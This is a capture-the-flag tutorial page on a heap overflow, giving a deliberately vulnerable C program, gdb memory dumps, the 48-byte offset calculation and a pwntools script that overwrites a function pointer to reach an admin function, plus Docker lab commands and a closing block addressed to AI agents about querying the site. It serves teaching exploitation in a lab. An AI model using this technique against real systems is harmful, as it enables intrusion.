# Challenge example The exploitation of a [**Heap overflow**](/pwn/heap-exploitation/heap-overflow.md) depend on the program implementation. With this example, the attacker can exploit this in order to jump to an arbitrary function : "admin" ## Source code ```c #include #include #include struct user{ char username[32]; char password[32]; }; typedef struct ticket { void (*display)(struct ticket*); char username[32]; char content[24]; } Ticket; void display(Ticket *t){ printf("%s\n", t->content); } char login(struct user *u){ char secret[16] = ""; char c; FILE *fp = fopen(".passwd", "r"); fread(secret, 1, 15, fp); fclose(fp); secret[15] = '\0'; if (strcmp(u->password, secret) == 0 && strcmp(u->password, "admin") == 0) { return 1; } else { return 0; } } void admin(){ printf("Welcome admin\n"); // Make admin stuff } int main(int argc, char **argv){ int log; char c=1, i; char buf[8]; struct user *u = malloc(sizeof(struct user)); strcpy(u->username, "Guest"); strcpy(u->password, ""); struct ticket *t = malloc(sizeof(struct ticket)); t->display = display; strcpy(t->content, ""); strcpy(t->username, u->username); while(c){ printf("Press enter char to continue..."); fgets(buf, 8, stdin); getchar(); printf("\e[1;1H\e[2J"); printf("Welcome %-10s.\nWhat to do you want to do ?\n", u->username); printf("1 - Read ticket\n"); printf("2 - Create ticket\n"); printf("3 - Delete ticket\n"); printf("4 - Submit tickets\n"); printf("5 - login\n"); printf("0 - Exit\n"); printf("Choice > "); scanf("%1s", buf); i = buf[0]; printf("\e[1;1H\e[2J"); switch (i) { case '0': c = 0; break; case '1': printf("Resume : \n"); t->display(t); break; case '2': printf("Ticket content : \n"); scanf("%24s",t->content); fflush(stdout); break; case '5': printf("Please enter credentials : \n"); printf("Username : "); scanf("%s", u->username); printf("Password : "); scanf("%s", u->password); if (login(u) == 1){ admin(); } break; default: printf("Function not yet implemented !\n"); } } return 0; } ``` ### Structures There is two used structure inside this program : * **user** ```c struct user{ char username[32]; char password[32]; }; ``` This structure has a size = 64 bytes ( 32 for username and 32 for password ) * **ticket** ```c typedef struct ticket { void (*display)(struct ticket*); char username[32]; char content[24]; } Ticket; ``` This structure has a size = 64 bytes ( 8 for \*display , 32 for username and 24 for content ) {% hint style="info" %} **Note:** \*display is a pointer to a function. The two struct have the exact same size. It's not required but it's easier to exploit because the two allocated chunk will be taken from the same bin. {% endhint %} ### login() ```c char login(struct user *u){ char secret[16] = ""; char c; FILE *fp = fopen(".passwd", "r"); fread(secret, 1, 15, fp); fclose(fp); secret[15] = '\0'; if (strcmp(u->password, secret) == 0 && strcmp(u->password, "admin") == 0) { return 1; } else { return 0; } } ``` This function will simply compare the username and the password with those for the admin user, if it's equals than the user is admin else it's a guest. ### main There is two parts into this function : #### Variables setup ```c int log; char c=1, i; char buf[8]; struct user *u = malloc(sizeof(struct user)); strcpy(u->username, "Guest"); strcpy(u->password, ""); struct ticket *t = malloc(sizeof(struct ticket)); t->display = display; strcpy(t->content, ""); strcpy(t->username, u->username); ``` This part setup needed variables. {% hint style="info" %} Note that `struct user *u = malloc(sizeof(struct user));` and `struct ticket *t = malloc(sizeof(struct ticket));` are made directly one after the other. Because there have the exact same size and their are declared at the same time, their position in memory will be side by side. {% endhint %} #### Menu loop ```c while(c){ printf("Press enter char to continue..."); fgets(buf, 8, stdin); getchar(); printf("\e[1;1H\e[2J"); printf("Welcome %-10s.\nWhat to do you want to do ?\n", u->username); printf("1 - Read ticket\n"); printf("2 - Create ticket\n"); printf("3 - Delete ticket\n"); printf("4 - Submit tickets\n"); printf("5 - login\n"); printf("0 - Exit\n"); printf("Choice > "); scanf("%1s", buf); i = buf[0]; printf("\e[1;1H\e[2J"); switch (i) { case '0': c = 0; break; case '1': printf("Resume : \n"); t->display(t); break; case '2': printf("Ticket content : \n"); scanf("%24s",t->content); fflush(stdout); break; case '5': printf("Please enter credentials : \n"); printf("Username : "); scanf("%s", u->username); printf("Password : "); scanf("%s", u->password); if (login(u) == 1){ admin(); } break; default: printf("Function not yet implemented !\n"); } } ``` The user have some possible actions : 1. **Read ticket** This action will call the `display` function pointed by the pointer stored inside the ticket. 2. **Create ticket** This action will set the content and username values of the ticket 5. **login** This action permit to the user to provide `username` and `password` to login. {% hint style="info" %} Note: both username and password are get from user input without any length control. **Here is the overflow** {% endhint %} ## Exploitation As explain before, the two allocated chunk are side by side in memory and have the exact same size (64 bytes) The objective is to overwrite the `display` pointer to make it point to the `admin` function. Let's check the memory state : ```bash gdb-peda$ i locals log = c = 0x1 i = 0x35 buf = "5\000\000\000\000\000\000" u = 0x4052a0 t = 0x4052f0 ``` **`u`** is stored at `0x4052a0` and **`t`** at `0x4052f0` By using `login` action, 10 `A` are put as username and 10 `B` as password to clearly identified their position in memory The same is used for ticket content with 10 `C` ```bash gdb-peda$ x/20x 0x4052a0 0x4052a0: 0x4141414141414141 0x0000000000004141 0x4052b0: 0x0000000000000000 0x0000000000000000 0x4052c0: 0x4242424242424242 0x4242424242004242 0x4052d0: 0x0000000000004242 0x0000000000000000 0x4052e0: 0x0000000000000000 0x0000000000000051 0x4052f0: 0x00000000004012b6 0x0000007473657547 0x405300: 0x0000000000000000 0x0000000000000000 0x405310: 0x0000000000000000 0x4343434343434343 0x405320: 0x0000000000004343 0x0000000000000000 0x405330: 0x0000000000000000 0x0000000000000411 ``` {% hint style="info" %} Datas can clearly be identified : `username` is at the beginning of the **`u`** chunk Followed by `password` Next there is the **`t`** metadatas at `0x4052f0` there is the `display` pointer followed by the others `ticket` datas. {% endhint %} To overwrite the `display` pointer, it's needed to overwrite `0x4052f0 - 0x4052c0 = 48` bytes before writing the arbitrary address. {% hint style="info" %} The amount of bytes to overwrite can also be calculated with data size : `password = 32 bytes` `t metadatas = 16 bytes` `16 + 32 = 48` {% endhint %} The data send as password will then be : `"A"*48 + p64(elf.symbols['admin'])` ### Exploit script ```python from pwn import * elf = context.binary = ELF("./chall") p = process() p.sendline() target = p64(elf.symbols['admin']) def choice(c): p.sendline() p.recv(timeout=1) p.sendline(c) def login(username, password): choice(b'5') p.recv(timeout=1) p.sendline(username) p.recv(timeout=1) p.sendline(password) login(b"A", b"B"*48 + target) choice(b'1') p.interactive() p.close() ``` ## Exercice If you want to try this exploit by yourself, you can pull [this docker image](https://hub.docker.com/r/thectfrecipes/pwn/general) : ``` docker pull thectfrecipes/pwn:heap_overflow ``` Deploy the image using the followed command : ``` docker run --name heap_overflow -it --rm -d -p 3000:3000 thectfrecipes/pwn:heap_overflow ``` Access to the web shell with your browser at the address : `http://localhost:3000/` ``` login: challenge password: password ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.ctfrecipes.com/pwn/heap-exploitation/heap-overflow/challenge-example.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.